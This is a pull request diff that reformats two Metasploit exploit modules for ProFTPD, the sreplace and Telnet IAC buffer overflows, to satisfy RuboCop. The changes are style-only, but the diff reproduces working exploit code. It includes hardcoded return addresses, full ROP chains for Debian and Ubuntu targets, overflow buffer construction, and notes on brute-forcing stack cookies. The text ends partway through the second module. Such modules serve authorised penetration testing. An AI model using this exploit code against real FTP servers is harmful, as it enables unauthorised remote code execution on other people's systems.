### PR TITLE
modules/exploits/linux/ftp: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/linux/ftp/proftp_sreplace.rb
+++ b/modules/exploits/linux/ftp/proftp_sreplace.rb
@@ -9,47 +9,47 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Ftp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)',
+        'Description' => %q{
           This module exploits a stack-based buffer overflow in versions 1.2 through
-        1.3.0 of ProFTPD server. The vulnerability is within the "sreplace" function
-        within the "src/support.c" file.
+          1.3.0 of ProFTPD server. The vulnerability is within the "sreplace" function
+          within the "src/support.c" file.
 
-        The off-by-one heap overflow bug in the ProFTPD sreplace function has been
-        discovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit
-        this off-by-one bug via MKD command, but failed. We did not work on this bug
-        since then.
+          The off-by-one heap overflow bug in the ProFTPD sreplace function has been
+          discovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit
+          this off-by-one bug via MKD command, but failed. We did not work on this bug
+          since then.
 
-        Actually, there are exists at least two bugs in sreplace function, one is the
-        mentioned off-by-one heap overflow bug the other is a stack-based buffer overflow
-        via 'sstrncpy(dst,src,negative argument)'.
+          Actually, there are exists at least two bugs in sreplace function, one is the
+          mentioned off-by-one heap overflow bug the other is a stack-based buffer overflow
+          via 'sstrncpy(dst,src,negative argument)'.
 
-        We were unable to reach the "sreplace" stack bug on ProFTPD 1.2.10 stable
-        version, but the version 1.3.0rc3 introduced some interesting changes, among them:
+          We were unable to reach the "sreplace" stack bug on ProFTPD 1.2.10 stable
+          version, but the version 1.3.0rc3 introduced some interesting changes, among them:
 
-        1. another (integer) overflow in sreplace!
-        2. now it is possible to reach sreplace stack-based buffer overflow bug via
+          1. another (integer) overflow in sreplace!
+          2. now it is possible to reach sreplace stack-based buffer overflow bug via
           the "pr_display_file" function!
-        3. stupid '.message' file display bug
+          3. stupid '.message' file display bug
 
-        So we decided to choose ProFTPD 1.3.0 as a target for our exploit.
-        To reach the bug, you need to upload a specially created .message file to a
-        writeable directory, then do "CWD <writeable directory>" to trigger the invocation
-        of sreplace function.
+          So we decided to choose ProFTPD 1.3.0 as a target for our exploit.
+          To reach the bug, you need to upload a specially created .message file to a
+          writeable directory, then do "CWD <writeable directory>" to trigger the invocation
+          of sreplace function.
 
-        Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message'
-        file you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.
+          Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message'
+          file you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.
 
-        The exploit is a part of VulnDisco Pack since Dec 2005.
-      },
-      'Author'         =>
-        [
-          'Evgeny Legerov <admin[at]gleg.net>',  # original .pm version (VulnDisco)
-          'jduck'   # Metasploit 3.x port
+          The exploit is a part of VulnDisco Pack since Dec 2005.
+        },
+        'Author' => [
+          'Evgeny Legerov <admin[at]gleg.net>', # original .pm version (VulnDisco)
+          'jduck' # Metasploit 3.x port
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2006-5815' ],
           [ 'OSVDB', '68985' ],
           [ 'BID', '20992' ],
@@ -58,63 +58,69 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://bugs.proftpd.org/show_bug.cgi?id=2858' ],
           [ 'URL', 'http://proftp.cvs.sourceforge.net/proftp/proftpd/src/main.c?view=diff&r1=text&tr1=1.292&r2=text&tr2=1.294&diff_format=h' ]
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process',
           'PrependChrootBreak' => true
         },
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 900,
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 900,
           'BadChars' => "\x00\x0a\x0d\x25",
-          'DisableNops'	=>  'True',
+          'DisableNops'	=> true
         },
-      'Platform'       => [ 'linux' ],
-      'Targets'        =>
-      [
-        #
-        # Automatic targeting via fingerprinting
-        #
-        [ 'Automatic Targeting', { 'auto' => true }  ],
+        'Platform' => [ 'linux' ],
+        'Targets' => [
+          #
+          # Automatic targeting via fingerprinting
+          #
+          [ 'Automatic Targeting', { 'auto' => true } ],
 
-        #
-        # This special one comes first since we dont want its index changing.
-        #
-        [	'Debug',
-          {
-            'Ret' => 0x41414242,
-            'PoolAddr' => 0x43434545
-          }
+          #
+          # This special one comes first since we dont want its index changing.
+          #
+          [
+            'Debug',
+            {
+              'Ret' => 0x41414242,
+              'PoolAddr' => 0x43434545
+            }
+          ],
+
+          #
+          # specific targets
+          #
+
+          [
+            'ProFTPD 1.3.0 (source install) / Debian 3.1',
+            {
+              # objdump -D proftpd|grep call|grep edx
+              'Ret' => 0x804afc8, # call edx
+              # nm proftpd|grep permanent_pool
+              'PoolAddr' => 0x80b59f8
+            }
+          ]
+
         ],
-
-        #
-        # specific targets
-        #
-
-        [ "ProFTPD 1.3.0 (source install) / Debian 3.1",
-          {
-            # objdump -D proftpd|grep call|grep edx
-            'Ret' => 0x804afc8, # call edx
-            # nm proftpd|grep permanent_pool
-            'PoolAddr' => 0x80b59f8
-          }
-        ]
-
-      ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2006-11-26'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2006-11-26',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [UNRELIABLE_SESSION]
+        }
+      )
+    )
 
     register_options(
       [
         OptString.new('WRITABLE', [ true, 'A writable directory on the target host', '/incoming' ])
-      ])
+      ]
+    )
   end
-
 
   def check
     # NOTE: We don't care if the login failed here...
-    ret = connect
+    connect
 
     # We just want the banner to check against our targets..
     vprint_status("FTP Banner: #{banner.strip}")
@@ -122,9 +128,9 @@ class MetasploitModule < Msf::Exploit::Remote
     status = CheckCode::Safe
 
     if banner =~ /ProFTPD (1\.[23]\.[^ ])/i
-      ver = $1
-      maj,min,rel = ver.split('.')
-      relv = rel.slice!(0,1)
+      ver = ::Regexp.last_match(1)
+      _maj, _min, rel = ver.split('.')
+      relv = rel.slice!(0, 1)
       case relv
       when '2'
         status = CheckCode::Appears
@@ -132,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
       when '3'
         # 1.3.x before 1.3.1 is vulnerable
         status = CheckCode::Appears
-        if rel.length > 0
+        if !rel.empty?
           if rel.to_i > 0
             status = CheckCode::Safe
           else
@@ -146,34 +152,33 @@ class MetasploitModule < Msf::Exploit::Remote
     return status
   end
 
-
   def exploit
     connect_login
 
     # Use a copy of the target
     mytarget = target
 
-    if (target['auto'])
+    if target['auto']
       mytarget = nil
 
-      print_status("Automatically detecting the target...")
-      if (banner and (m = banner.match(/ProFTPD (1\.[23]\.[^ ])/i))) then
+      print_status('Automatically detecting the target...')
+      if (banner && (m = banner.match(/ProFTPD (1\.[23]\.[^ ])/i)))
         print_status("FTP Banner: #{banner.strip}")
         version = m[1]
       else
-        fail_with(Failure::NoTarget, "No matching target")
+        fail_with(Failure::NoTarget, 'No matching target')
       end
 
       regexp = Regexp.escape(version)
-      self.targets.each do |t|
-        if (t.name =~ /#{regexp}/) then
+      targets.each do |t|
+        if (t.name =~ /#{regexp}/)
           mytarget = t
           break
         end
       end
 
-      if (not mytarget)
-        fail_with(Failure::NoTarget, "No matching target")
+      if !mytarget
+        fail_with(Failure::NoTarget, 'No matching target')
       end
 
       print_status("Selected Target: #{mytarget.name}")
@@ -184,31 +189,31 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    #puts "attach and press any key"; bleh = $stdin.gets
-    res = send_cmd(['CWD', datastore['WRITABLE']])
+    # puts "attach and press any key"; bleh = $stdin.gets
+    send_cmd(['CWD', datastore['WRITABLE']])
 
     pwd = send_cmd(['PWD'])
-    if pwd !~ /257\s\"(.+)\"/
-      fail_with(Failure::Unknown, "Unable to get current working directory")
+    if pwd !~ /257\s"(.+)"/
+      fail_with(Failure::Unknown, 'Unable to get current working directory')
     end
-    pwd = $1
-    pwd << "/" if pwd[-1,1] != "/"
+    pwd = ::Regexp.last_match(1)
+    pwd << '/' if pwd[-1, 1] != '/'
 
-    dir1 = "A" * (251 - pwd.length)
-    res = send_cmd(['MKD', dir1])
+    dir1 = 'A' * (251 - pwd.length)
+    send_cmd(['MKD', dir1])
 
-    res = send_cmd(['CWD', dir1])
+    send_cmd(['CWD', dir1])
 
-    res = send_cmd(['PWD'])
+    send_cmd(['PWD'])
 
-    dir2 = "B" * 64
+    dir2 = 'B' * 64
     dir2 << [mytarget.ret].pack('V')
     dir2 << [mytarget['PoolAddr'] - 4].pack('V')
     dir2 << "\xcc" * 28
 
-    res = send_cmd(['DELE', "#{dir2}/.message"])
-    res = send_cmd(['DELE', "250"])
-    res = send_cmd(['RMD', dir2])
+    send_cmd(['DELE', "#{dir2}/.message"])
+    send_cmd(['DELE', '250'])
+    send_cmd(['RMD', dir2])
 
     filedata = ''
     filedata << 'A'
@@ -219,14 +224,13 @@ class MetasploitModule < Msf::Exploit::Remote
     filedata << rand_text_alphanumeric(900 - payload.encoded.length)
     filedata << "\x25\x43\x41" * 10
 
-    res = send_cmd(['MKD', dir2])
-    res = send_cmd_data(['PUT', "#{dir2}/.message"], filedata, 'I')
+    send_cmd(['MKD', dir2])
+    send_cmd_data(['PUT', "#{dir2}/.message"], filedata, 'I')
 
     # Trigger sreplace overflow
-    res = send_cmd(['CWD', dir2])
+    send_cmd(['CWD', dir2])
 
     handler
     disconnect
-
   end
 end

--- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb
+++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb
@@ -6,269 +6,278 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = GreatRanking
 
-  #include Msf::Exploit::Remote::Ftp
+  # include Msf::Exploit::Remote::Ftp
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)',
+        'Description' => %q{
           This module exploits a stack-based buffer overflow in versions of ProFTPD
-        server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a
-        large number of Telnet IAC commands, an attacker can corrupt memory and
-        execute arbitrary code.
+          server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a
+          large number of Telnet IAC commands, an attacker can corrupt memory and
+          execute arbitrary code.
 
-        The Debian Squeeze version of the exploit uses a little ROP stub to indirectly
-        transfer the flow of execution to a pool buffer (the cmd_rec "res" in
-        "pr_cmd_read").
+          The Debian Squeeze version of the exploit uses a little ROP stub to indirectly
+          transfer the flow of execution to a pool buffer (the cmd_rec "res" in
+          "pr_cmd_read").
 
-        The Ubuntu version uses a ROP stager to mmap RWX memory, copy a small stub
-        to it, and execute the stub. The stub then copies the remainder of the payload
-        in and executes it.
+          The Ubuntu version uses a ROP stager to mmap RWX memory, copy a small stub
+          to it, and execute the stub. The stub then copies the remainder of the payload
+          in and executes it.
 
-        NOTE: Most Linux distributions either do not ship a vulnerable version of
-        ProFTPD, or they ship a version compiled with stack smashing protection.
+          NOTE: Most Linux distributions either do not ship a vulnerable version of
+          ProFTPD, or they ship a version compiled with stack smashing protection.
 
-        Although SSP significantly reduces the probability of a single attempt
-        succeeding, it will not prevent exploitation. Since the daemon forks in a
-        default configuration, the cookie value will remain the same despite
-        some attempts failing. By making repeated requests, an attacker can eventually
-        guess the cookie value and exploit the vulnerability.
+          Although SSP significantly reduces the probability of a single attempt
+          succeeding, it will not prevent exploitation. Since the daemon forks in a
+          default configuration, the cookie value will remain the same despite
+          some attempts failing. By making repeated requests, an attacker can eventually
+          guess the cookie value and exploit the vulnerability.
 
-        The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness
-        and could allow exploitation in semi-reasonable amount of time.
-      },
-      'Author'         => [ 'jduck' ],
-      'References'     =>
-        [
+          The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness
+          and could allow exploitation in semi-reasonable amount of time.
+        },
+        'Author' => [ 'jduck' ],
+        'References' => [
           ['CVE', '2010-4221'],
           ['OSVDB', '68985'],
           ['BID', '44562']
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process',
           'PrependChrootBreak' => true
         },
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 4096,
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 4096,
           # NOTE: \xff are avoided here so we can control the number of them being sent.
           'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\xff",
-          'DisableNops'	=>  'True',
+          'DisableNops'	=> true
         },
-      'Platform'       => [ 'linux' ],
-      'Targets'        =>
-      [
-        #
-        # Automatic targeting via fingerprinting
-        #
-        [ 'Automatic Targeting', { 'auto' => true }  ],
+        'Platform' => [ 'linux' ],
+        'Targets' => [
+          #
+          # Automatic targeting via fingerprinting
+          #
+          [ 'Automatic Targeting', { 'auto' => true } ],
 
-        #
-        # This special one comes first since we dont want its index changing.
-        #
-        [	'Debug',
-          {
-            'IACCount' => 8192, # should cause crash writing off end of stack
-            'Offset' => 0,
-            'Ret' => 0x41414242,
-            'Writable' => 0x43434545
-          }
+          #
+          # This special one comes first since we dont want its index changing.
+          #
+          [
+            'Debug',
+            {
+              'IACCount' => 8192, # should cause crash writing off end of stack
+              'Offset' => 0,
+              'Ret' => 0x41414242,
+              'Writable' => 0x43434545
+            }
+          ],
+
+          #
+          # specific targets
+          #
+
+          # NOTE: this minimal rop works most of the time, but it can fail
+          # if the proftpd pool memory is in a different order for whatever reason...
+          [
+            'ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1',
+            {
+              'IACCount' => 4096 + 16,
+              'Offset' => 0x102c - 4,
+              # NOTE: All addresses are from the proftpd binary
+              'Ret' => 0x805a547, # pop esi / pop ebp / ret
+              'Writable' => 0x80e81a0, # .data
+              'RopStack' =>
+                [
+                  # Writable is here
+                  0xcccccccc, # unused
+                  0x805a544,  # mov eax,esi / pop ebx / pop esi / pop ebp / ret
+                  0xcccccccc, # becomes ebx
+                  0xcccccccc, # becomes esi
+                  0xcccccccc, # becomes ebp
+                  # quadruple deref the res pointer :)
+                  0x8068886,  # mov eax,[eax] / ret
+                  0x8068886,  # mov eax,[eax] / ret
+                  0x8068886,  # mov eax,[eax] / ret
+                  0x8068886,  # mov eax,[eax] / ret
+                  # skip the pool chunk header
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  # execute the data :)
+                  0x0805c26c, # jmp eax
+                ]
+            }
+          ],
+
+          # For the version compiled with symbols :)
+          [
+            'ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)',
+            {
+              'IACCount' => 4096 + 16,
+              'Offset' => 0x1028 - 4,
+              # NOTE: All addresses are from the proftpd binary
+              'Writable' => 0x80ec570, # .data
+              'Ret' => 0x80d78c2, # pop esi / pop ebp / ret
+              'RopStack' =>
+                [
+                  # Writable is here
+                  # 0x0808162a, # jmp esp (works w/esp fixup)
+                  0xcccccccc, # unused becomes ebp
+                  0x80d78c2,  # mov eax,esi / pop esi / pop ebp / ret
+                  0xcccccccc, # unused becomes esi
+                  0xcccccccc, # unused becomes ebp
+                  # quadruple deref the res pointer :)
+                  0x806a915,  # mov eax,[eax] / pop ebp / ret
+                  0xcccccccc, # unused becomes ebp
+                  0x806a915,  # mov eax,[eax] / pop ebp / ret
+                  0xcccccccc, # unused becomes ebp
+                  0x806a915,  # mov eax,[eax] / pop ebp / ret
+                  0xcccccccc, # unused becomes ebp
+                  0x806a915,  # mov eax,[eax] / pop ebp / ret
+                  0xcccccccc, # unused becomes ebp
+                  # skip the pool chunk header
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  # execute the data :)
+                  0x08058de6, # jmp eax
+                ]
+            }
+          ],
+
+          [
+            'ProFTPD 1.3.2c Server (Ubuntu 10.04)',
+            {
+              'IACCount' => 1018,
+              'Offset' => 0x420,
+              'CookieOffset' => -0x20,
+              'Writable' => 0x80db3a0, # becomes esi (beginning of .data)
+              'Ret' => 0x805389b, # pop esi / pop ebp / ret
+              'RopStack' =>
+                [
+                  0xcccccccc, # becomes ebp
+
+                  0x8080f04,  # pop eax / ret
+                  0x80db330,  # becomes eax (GOT of mmap64)
+
+                  0x806a716,  # mov eax, [eax] / ret
+                  0x805dd5c,  # jmp eax
+                  0x80607b2,  # add esp, 0x24 / pop ebx / pop ebp / ret
+                  # mmap args
+                  0, 0x20000, 0x7, 0x22, 0xffffffff, 0,
+                  0, # unused
+                  0xcccccccc, # unused
+                  0xcccccccc, # unused
+                  0x100000000 - 0x5d5b24c4 + 0x80db3a4, # becomes ebx
+                  0xcccccccc, # becomes ebp
+
+                  # note, ebx gets fixed above :)
+                  # 0xfe in 'ah' doesn't matter since we have more than enough space.
+                  # now, load an instruction to store to eax
+                  0x808b542, # pop edx / mov ah, 0xfe / inc dword ptr [ebx+0x5d5b24c4] / ret
+                  # becomes edx - mov [eax+ebp*4]; ebx / ret
+                  "\x89\x1c\xa8\xc3".unpack('V').first,
+
+                  # store it :)
+                  0x805c2d0,  # mov [eax], edx / add esp, 0x10 / pop ebx / pop esi / pop ebp / ret
+                  0xcccccccc, # unused
+                  0xcccccccc, # unused
+                  0xcccccccc, # unused
+                  0xcccccccc, # unused
+                  0xcccccccc, # becomes ebx
+                  0xcccccccc, # becomes esi
+                  0xcccccccc, # becomes ebp
+
+                  # Copy the following stub:
+                  # "\x8d\xb4\x24\x21\xfb\xff\xff" # lea esi, [esp-0x4df]
+                  # "\x8d\x78\x12" # lea edi, [eax+0x12]
+                  # "\x6a\x7f"     # push 0x7f
+                  # "\x59"         # pop ecx
+                  # "\xf2\xa5"     # rep movsd
+
+                  0x80607b5,  # pop ebx / pop ebp / ret
+                  0xfb2124b4, # becomes ebx
+                  1, # becomes ebp
+                  0x805dd5c,  # jmp eax
+
+                  0x80607b5,  # pop ebx / pop ebp / ret
+                  0x788dffff, # becomes ebx
+                  2, # becomes ebp
+                  0x805dd5c,  # jmp eax
+
+                  0x80607b5,  # pop ebx / pop ebp / ret
+                  0x597f6a12, # becomes ebx
+                  3, # becomes ebp
+                  0x805dd5c,  # jmp eax
+
+                  0x80607b5,  # pop ebx / pop ebp / ret
+                  0x9090a5f2, # becomes ebx
+                  4, # becomes ebp
+                  0x805dd5c,  # jmp eax
+
+                  0x80607b5,  # pop ebx / pop ebp / ret
+                  0x8d909090, # becomes ebx
+                  0, # becomes ebp
+                  0x805dd5c, # jmp eax
+
+                  # hopefully we dont get here
+                  0xcccccccc,
+                ]
+            }
+          ]
+
         ],
-
-        #
-        # specific targets
-        #
-
-        # NOTE: this minimal rop works most of the time, but it can fail
-        # if the proftpd pool memory is in a different order for whatever reason...
-        [ 'ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1',
-          {
-            'IACCount' => 4096+16,
-            'Offset' => 0x102c-4,
-            # NOTE: All addresses are from the proftpd binary
-            'Ret' => 0x805a547, # pop esi / pop ebp / ret
-            'Writable' => 0x80e81a0, # .data
-            'RopStack' =>
-              [
-                # Writable is here
-                0xcccccccc, # unused
-                0x805a544,  # mov eax,esi / pop ebx / pop esi / pop ebp / ret
-                0xcccccccc, # becomes ebx
-                0xcccccccc, # becomes esi
-                0xcccccccc, # becomes ebp
-                # quadruple deref the res pointer :)
-                0x8068886,  # mov eax,[eax] / ret
-                0x8068886,  # mov eax,[eax] / ret
-                0x8068886,  # mov eax,[eax] / ret
-                0x8068886,  # mov eax,[eax] / ret
-                # skip the pool chunk header
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                # execute the data :)
-                0x0805c26c, # jmp eax
-              ],
-          }
-        ],
-
-        # For the version compiled with symbols :)
-        [ 'ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)',
-          {
-            'IACCount' => 4096+16,
-            'Offset' => 0x1028-4,
-            # NOTE: All addresses are from the proftpd binary
-            'Writable' => 0x80ec570, # .data
-            'Ret' => 0x80d78c2, # pop esi / pop ebp / ret
-            'RopStack' =>
-              [
-                # Writable is here
-                #0x0808162a, # jmp esp (works w/esp fixup)
-                0xcccccccc, # unused becomes ebp
-                0x80d78c2,  # mov eax,esi / pop esi / pop ebp / ret
-                0xcccccccc, # unused becomes esi
-                0xcccccccc, # unused becomes ebp
-                # quadruple deref the res pointer :)
-                0x806a915,  # mov eax,[eax] / pop ebp / ret
-                0xcccccccc, # unused becomes ebp
-                0x806a915,  # mov eax,[eax] / pop ebp / ret
-                0xcccccccc, # unused becomes ebp
-                0x806a915,  # mov eax,[eax] / pop ebp / ret
-                0xcccccccc, # unused becomes ebp
-                0x806a915,  # mov eax,[eax] / pop ebp / ret
-                0xcccccccc, # unused becomes ebp
-                # skip the pool chunk header
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                # execute the data :)
-                0x08058de6, # jmp eax
-              ],
-          }
-        ],
-
-        [ 'ProFTPD 1.3.2c Server (Ubuntu 10.04)',
-          {
-            'IACCount' => 1018,
-            'Offset' => 0x420,
-            'CookieOffset' => -0x20,
-            'Writable' => 0x80db3a0, # becomes esi (beginning of .data)
-            'Ret' => 0x805389b,  # pop esi / pop ebp / ret
-            'RopStack' =>
-              [
-                0xcccccccc, # becomes ebp
-
-                0x8080f04,  # pop eax / ret
-                0x80db330,  # becomes eax (GOT of mmap64)
-
-                0x806a716,  # mov eax, [eax] / ret
-                0x805dd5c,  # jmp eax
-                0x80607b2,  # add esp, 0x24 / pop ebx / pop ebp / ret
-                # mmap args
-                0, 0x20000, 0x7, 0x22, 0xffffffff, 0,
-                0, # unused
-                0xcccccccc, # unused
-                0xcccccccc, # unused
-                0x100000000 - 0x5d5b24c4 + 0x80db3a4, # becomes ebx
-                0xcccccccc, # becomes ebp
-
-                # note, ebx gets fixed above :)
-                # 0xfe in 'ah' doesn't matter since we have more than enough space.
-                # now, load an instruction to store to eax
-                0x808b542,  # pop edx / mov ah, 0xfe / inc dword ptr [ebx+0x5d5b24c4] / ret
-                # becomes edx - mov [eax+ebp*4]; ebx / ret
-                "\x89\x1c\xa8\xc3".unpack('V').first,
-
-                # store it :)
-                0x805c2d0,  # mov [eax], edx / add esp, 0x10 / pop ebx / pop esi / pop ebp / ret
-                0xcccccccc, # unused
-                0xcccccccc, # unused
-                0xcccccccc, # unused
-                0xcccccccc, # unused
-                0xcccccccc, # becomes ebx
-                0xcccccccc, # becomes esi
-                0xcccccccc, # becomes ebp
-
-                # Copy the following stub:
-                #"\x8d\xb4\x24\x21\xfb\xff\xff" # lea esi, [esp-0x4df]
-                #"\x8d\x78\x12"  # lea edi, [eax+0x12]
-                #"\x6a\x7f"   # push 0x7f
-                #"\x59"	    # pop ecx
-                #"\xf2\xa5"   # rep movsd
-
-                0x80607b5,  # pop ebx / pop ebp / ret
-                0xfb2124b4, # becomes ebx
-                1, # becomes ebp
-                0x805dd5c,  # jmp eax
-
-                0x80607b5,  # pop ebx / pop ebp / ret
-                0x788dffff, # becomes ebx
-                2, # becomes ebp
-                0x805dd5c,  # jmp eax
-
-                0x80607b5,  # pop ebx / pop ebp / ret
-                0x597f6a12, # becomes ebx
-                3, # becomes ebp
-                0x805dd5c,  # jmp eax
-
-                0x80607b5,  # pop ebx / pop ebp / ret
-                0x9090a5f2, # becomes ebx
-                4, # becomes ebp
-                0x805dd5c,  # jmp eax
-
-                0x80607b5,  # pop ebx / pop ebp / ret
-                0x8d909090, # becomes ebx
-                0, # becomes ebp
-                0x805dd5c,  # jmp eax
-
-                # hopefully we dont get here
-                0xcccccccc,
-              ],
-          }
-        ]
-
-      ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2010-11-01'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2010-11-01',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [UNRELIABLE_SESSION]
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(21),
-      ])
+      ]
+    )
   end
-
 
   def check
     # NOTE: We don't care if the login failed here...
-    ret = connect
+    connect
     banner = sock.get_once || ''
 
     # We just want the banner to check against our targets..
@@ -278,7 +287,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if banner =~ /ProFTPD (1\.3\.[23])/i
       banner_array = banner.split('.')
 
-      if banner_array.count() > 0 && !banner_array[3].nil?
+      if banner_array.count > 0 && !banner_array[3].nil?
         # gets 1 char on the third part of version number.
         relnum = banner_array[2][0..0]
         tmp = banner_array[2].split(' ')
@@ -286,7 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote
         # example: 1.2.3rc ('rc' string)
         extra = tmp[0][1..(tmp[0].length - 1)]
         if relnum == '2'
-          if extra.length > 0
+          if !extra.empty?
             if extra[0..1] == 'rc'
               v = extra[2..extra.length].to_i
               if v && v > 2
@@ -308,7 +317,6 @@ class MetasploitModule < Msf::Exploit::Remote
     return status
   end
 
-
   def exploit
     connect
     banner = sock.get_once || ''
@@ -316,27 +324,27 @@ class MetasploitModule < Msf::Exploit::Remote
     # Use a copy of the target
     mytarget = target
 
-    if (target['auto'])
+    if target['auto']
       mytarget = nil
 
-      print_status("Automatically detecting the target...")
-      if (banner and (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i))) then
+      print_status('Automatically detecting the target...')
+      if (banner && (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i)))
         print_status("FTP Banner: #{banner.strip}")
         version = m[1]
       else
-        fail_with(Failure::NoTarget, "No matching target")
+        fail_with(Failure::NoTarget, 'No matching target')
       end
 
       regexp = Regexp.escape(version)
-      self.targets.each do |t|
-        if (t.name =~ /#{regexp}/) then
+      targets.each do |t|
+        if (t.name =~ /#{regexp}/)
           mytarget = t
           break
         end
       end
 
-      if (not mytarget)
